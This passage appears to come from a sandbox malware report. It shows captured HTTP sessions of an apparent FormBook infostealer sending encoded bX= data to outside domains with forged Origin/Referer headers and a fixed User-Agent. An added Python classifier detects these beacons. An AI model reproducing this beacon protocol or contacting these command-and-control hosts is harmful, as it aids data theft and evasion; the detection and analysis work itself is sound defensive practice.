                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
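
                              The sessions above all share one request shape: a four-character path with a trailing slash (/wjff/, /3lkx/, /h5qr/), a GET carrying bX= and RFRd_= query parameters or a POST whose form body is a single bX= field, Origin and Referer forged to the same host and path, Connection: close, and one fixed Android Chrome User-Agent, repeated against several hosts from the same PID. The block below is an added example, not part of the Joe Sandbox report and not FormBook's or Joe Security's code: a small classifier that parses raw HTTP requests and scores them against those traits. The sample requests are constructed from the captures above with the bX values shortened, the benign request is invented for contrast, the path regex and the three-trait threshold are assumptions rather than anything the report states, and the helper names are the author's own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set
from urllib.parse import parse_qs, urlsplit

# User-Agent sent, byte for byte, in every session captured in the report.
FORMBOOK_UA = (
    "Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36"
)
# Captured paths are a four-character lowercase token between slashes (/wjff/, /3lkx/, /h5qr/).
# Treating that as the general shape is an assumption, not something the report states.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: Dict[str, str]  # header names lower-cased
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Parse one raw HTTP/1.1 request: request line, headers, blank line, optional body."""
    head, _, body = raw.strip("\n").partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body.strip())


def formbook_traits(req: HttpRequest) -> List[str]:
    """Return the beacon traits from the captured sessions that this request exhibits."""
    traits: List[str] = []
    url = urlsplit(req.target)
    host = req.headers.get("host", "")
    if req.headers.get("user-agent") == FORMBOOK_UA:
        traits.append("fixed-android-ua")
    if PATH_RE.match(url.path):
        traits.append("four-char-path")
    if req.headers.get("connection", "").lower() == "close":
        traits.append("connection-close")
    if req.method == "GET":
        query = parse_qs(url.query, keep_blank_values=True)
        if "bX" in query and "RFRd_" in query:
            traits.append("get-bX-RFRd_")
    elif req.method == "POST":
        form = parse_qs(req.body, keep_blank_values=True)
        if list(form) == ["bX"]:
            traits.append("post-single-bX")
        # Origin and Referer are set to look like a form posted from the same path.
        if host and (
            req.headers.get("origin") == f"http://{host}"
            and req.headers.get("referer") == f"http://{host}{url.path}"
        ):
            traits.append("forged-origin-referer")
    return traits


def is_formbook_beacon(req: HttpRequest, min_traits: int = 3) -> bool:
    """Three matching traits is an assumed threshold chosen to tolerate minor variation."""
    return len(formbook_traits(req)) >= min_traits


def beacon_hosts(reqs: List[HttpRequest]) -> Set[str]:
    """Hosts that received beacon-shaped requests; the captures hit several hosts in turn."""
    return {r.headers.get("host", "") for r in reqs if is_formbook_beacon(r)}


# Constructed samples, cut down from the captured sessions (bX values shortened).
SAMPLE_GET = """GET /3lkx/?bX=RihUS+ZcBcWtP49fbKLPl8hUiWX9OeM0xYk2jkkE&RFRd_=tFLD HTTP/1.1
Host: www.bola88site.one
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
"""

SAMPLE_POST = """POST /h5qr/ HTTP/1.1
Host: www.kckartal.xyz
Origin: http://www.kckartal.xyz
Referer: http://www.kckartal.xyz/h5qr/
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 51
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

bX=yZO9aB74W3A3ueZehpUS2Pru927qqbfUFNin2PNNmq9T1LIq
"""

# Constructed benign request for contrast; not from the report.
SAMPLE_BENIGN = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: keep-alive
"""
```

Run over a proxy or Zeek http.log export, `beacon_hosts()` is the useful output: a single process cycling through unrelated low-reputation domains with this exact shape, and getting 404s back from all of them, is the pattern the sessions above show, and the hostnames themselves are not worth pinning a rule to.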


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              29 | 192.168.2.5 | 58674 | 104.21.20.125 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:43.412455082 CEST | 724 | OUT | POST /h5qr/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.kckartal.xyz
                              Origin: http://www.kckartal.xyz
                              Referer: http://www.kckartal.xyz/h5qr/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 65 5a 65 68 70 55 53 32 50 72 75 39 32 37 71 71 62 66 55 46 4e 69 6e 32 50 4e 4e 6d 71 39 54 31 4c 49 71 49 61 78 77 70 6f 4b 53 63 56 66 77 41 4f 75 69 4e 63 30 53 45 61 64 72 38 46 4e 6c 32 6e 4a 52 63 63 32 30 6f 4a 41 33 35 72 71 67 52 36 69 4c 67 7a 37 58 62 39 79 72 66 34 49 2b 49 53 78 33 42 2b 43 4b 69 6a 31 6c 58 61 79 6f 4d 63 6c 73 6e 34 41 36 4f 51 73 74 53 35 70 4d 65 77 77 56 47 59 70 46 4c 4d 66 2b 47 4a 72 49 43 43 66 30 74 35 48 6e 68 63 79 4c 41 5a 74 50 45 75 50 4d 62 59 35 45 42 31 55 64 70 6a 55 6f 6a 6e 39 52 75 65 2b 68 4c 6f 51 3d
                              Data Ascii: bX=yZO9aB74W3A3ueZehpUS2Pru927qqbfUFNin2PNNmq9T1LIqIaxwpoKScVfwAOuiNc0SEadr8FNl2nJRcc20oJA35rqgR6iLgz7Xb9yrf4I+ISx3B+CKij1lXayoMclsn4A6OQstS5pMewwVGYpFLMf+GJrICCf0t5HnhcyLAZtPEuPMbY5EB1UdpjUojn9Rue+hLoQ=
                              Sep 16, 2024 09:31:43.986692905 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:43 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              vary: User-Agent
                              x-turbo-charged-by: LiteSpeed
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0vilVpx40x61Ge10nFDxY7ev4DGRdez%2BsvnRawnbjux7c6%2BETtY4dcE6UgMYxG%2BF7OMUdQiFHeRMIQpu%2F1SwTQwXpvq0dJh2%2F50YRDKl4YpHSKoGvwECirpTNLRvBaoP9f18"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c3f2896cfba42d7-EWR
                              Content-Encoding: gzip
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                              Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                              Sep 16, 2024 09:31:43.986711979 CEST | 240 | IN | Data Raw: 85 06 a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47
                              Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?be0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              30 | 192.168.2.5 | 58675 | 104.21.20.125 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:45.957672119 CEST | 744 | OUT | POST /h5qr/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.kckartal.xyz
                              Origin: http://www.kckartal.xyz
                              Referer: http://www.kckartal.xyz/h5qr/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 70 54 79 76 45 71 4a 65 6c 77 75 6f 4b 53 55 31 66 78 45 4f 75 70 4e 63 34 67 45 59 35 72 38 46 5a 6c 32 6e 5a 52 64 72 69 33 71 5a 41 69 30 4c 71 69 50 4b 69 4c 67 7a 37 58 62 39 4f 42 66 34 77 2b 49 43 42 33 44 63 6e 63 38 54 31 6d 57 61 79 6f 65 73 6c 6f 6e 34 42 5a 4f 56 31 4b 53 37 68 4d 65 79 34 56 46 4d 39 61 42 4d 66 34 43 4a 71 67 44 32 47 47 6b 2f 62 30 6e 64 48 6b 54 71 35 41 46 59 69 6d 42 36 78 73 53 56 34 6c 35 77 63 66 79 58 63 34 30 39 75 52 56 2f 47 79 57 46 4b 38 4f 77 4d 30 79 71 67 72 49 4f 68 31 70 76 50 48
                              Data Ascii: bX=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYpTyvEqJelwuoKSU1fxEOupNc4gEY5r8FZl2nZRdri3qZAi0LqiPKiLgz7Xb9OBf4w+ICB3Dcnc8T1mWayoeslon4BZOV1KS7hMey4VFM9aBMf4CJqgD2GGk/b0ndHkTq5AFYimB6xsSV4l5wcfyXc409uRV/GyWFK8OwM0yqgrIOh1pvPH
                              Sep 16, 2024 09:31:46.544471979 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:46 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              vary: User-Agent
                              x-turbo-charged-by: LiteSpeed
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EZx2ihxGdHIqA2AtrHtjPuWTSu1gx6QacJUPtVkIv0kYDSfOWXuP4XVdWyGuZioI6vJGbyQFVvxO19hKk99fkz7odlFbJA3qFGQ82ZsvWZ8e4E446nFbW2X57E9NqDxgpbTu"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c3f28a6ad0d43b3-EWR
                              Content-Encoding: gzip
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                              Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!
                              Sep 16, 2024 09:31:46.544578075 CEST | 230 | IN | Data Raw: 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a c3 e3 24 ae 6f ae
                              Data Ascii: E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?be0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              31 | 192.168.2.5 | 58676 | 104.21.20.125 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:48.502749920 CEST | 1761 | OUT | POST /h5qr/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.kckartal.xyz
                              Origin: http://www.kckartal.xyz
                              Referer: http://www.kckartal.xyz/h5qr/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 78 54 31 63 4d 71 49 38 4e 77 76 6f 4b 53 61 56 66 30 45 4f 75 4f 4e 64 52 70 45 59 30 55 38 47 68 6c 77 45 68 52 55 36 69 33 77 4a 41 69 39 72 71 6a 52 36 6a 44 67 79 4c 54 62 35 75 42 66 34 77 2b 49 42 4a 33 45 4f 44 63 2b 54 31 6c 58 61 7a 70 4d 63 6c 4d 6e 34 34 69 4f 52 70 77 52 49 35 4d 65 53 49 56 4a 66 46 61 4e 4d 66 36 50 70 71 34 44 7a 65 64 6b 37 37 47 6e 64 44 64 54 71 52 41 48 65 7a 69 46 35 56 6d 4c 45 74 42 78 69 4d 46 31 48 4a 42 33 4c 7a 71 52 4e 6d 58 4c 6d 57 45 4a 48 46 30 2f 71 74 67 52 4b 68 50 70 6f 54 4a 64 6f 6d 42 6d 33 71 50 69 54 4a 56 43 36 4e 70 50 57 44 45 41 79 64 32 59 79 75 5a 74 46 37 51 4f 72 79 4e 67 54 2b 37 52 57 64 7a 50 77 44 46 38 79 4d 51 36 42 42 34 4d 58 69 50 2b 6c 65 46 4e 2f 51 62 36 78 36 41 72 35 79 4e 50 4b 32 49 44 6c 73 52 78 6a 2b 6e 68 41 58 47 74 41 75 44 53 63 56 67 37 58 38 61 32 64 56 6b 67 4e 70 41 7a 63 50 [TRUNCATED]
                              Data Ascii: bX= [TRUNCATED]
                              Sep 16, 2024 09:31:49.109253883 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:49 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              vary: User-Agent
                              x-turbo-charged-by: LiteSpeed
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2FTPFsx%2BVEncxtcn2fF8bUNjyJdX%2FokuNVp8xbBaCAFow10tzPvMDQJDJp3CfkMtLjk93fbeUbTQSBBovQRCN21EkoBmPfPLXWh5WSPK0pXTsoCD5bRHMHzJCM%2B%2FLdkXTdGP"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c3f28b6bc4a7d06-EWR
                              Content-Encoding: gzip
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                              Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                              Sep 16, 2024 09:31:49.109277010 CEST | 235 | IN | Data Raw: 85 06 a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47
                              Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              32 | 192.168.2.5 | 58677 | 104.21.20.125 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:51.045483112 CEST | 462 | OUT | GET /h5qr/?bX=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.kckartal.xyz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:31:51.620973110 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:51 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              vary: User-Agent
                              x-turbo-charged-by: LiteSpeed
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ttT8K7JoGOXZsZvmzwVA2OgfsdzDKa2OkCicYGYlU1Mhk3LGGcIt0QMR9Hk4dUeCUlWETQH04pkrDWAvZy%2B%2FpyoC9cy159a0FxshnXJ5SUyckxv08bjoFzT4oSikOoyau%2FQ7"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c3f28c6783f8cc8-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                              Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; t
